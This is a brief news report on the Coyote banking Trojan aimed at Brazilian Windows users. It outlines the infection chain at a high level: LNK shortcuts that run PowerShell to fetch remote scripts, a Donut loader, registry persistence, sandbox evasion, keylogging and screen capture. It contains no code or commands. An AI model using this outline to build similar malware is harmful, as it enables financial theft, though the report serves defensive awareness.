Windows users in Brazil have recently been targeted by a new cyber attack involving the distribution of the Coyote banking Trojan. This malware is capable of targeting more than 70 financial applications and operates through a complex multi-stage infection process.
According to experts from Fortinet, the Trojan is highly sophisticated as it can capture keystrokes, take screenshots, and manipulate banking site interfaces to intercept sensitive financial data. The malicious code is distributed through Windows (LNK) shortcuts that contain PowerShell commands.
The discovery of Coyote was first made by Kaspersky Lab in early 2024 when the attack used The Squirrel installer to launch a Node.js-based application on Electron, followed by a malicious payload in NIM.
In the updated version of the infection process, the malware is spread through LNK files that run PowerShell commands and fetch an additional script from a remote server. This script is then executed by an intermediate loader responsible for running the main malicious code.
Subsequently, the Donut tool is used to decrypt and run an executable file in Msil (Microsoft Intermediate Language). To maintain a persistent presence in the system, Coyote modifies the Windows registry by creating a record in the HCKUSoftwareMicrosoftWindowsCurrentVERSIONRUN section. This record triggers a hidden PowerShell command to download and execute encrypted code from a remote source.
Once launched, COYOTE gathers information about the targeted device, including details about installed antiviruses, and sends this data to the attackers. The malware also conducts system environment analysis to avoid detection in sandboxes and virtual machines.
The latest version of the Trojan has expanded its list of targeted sites and organizations to include over a thousand web resources, such as cryptocurrency exchanges and hotel services. When a user visits any of the listed sites, the malware connects to the attacker’s server and can carry out keylogging, screen capturing, or interface manipulation.
Security researchers emphasize that the multi-stage infection process employed by Coyote makes it particularly perilous. The use of LNK files in the initial stages enables it to evade traditional security measures, while the intricate structure of the malicious code complicates detection and analysis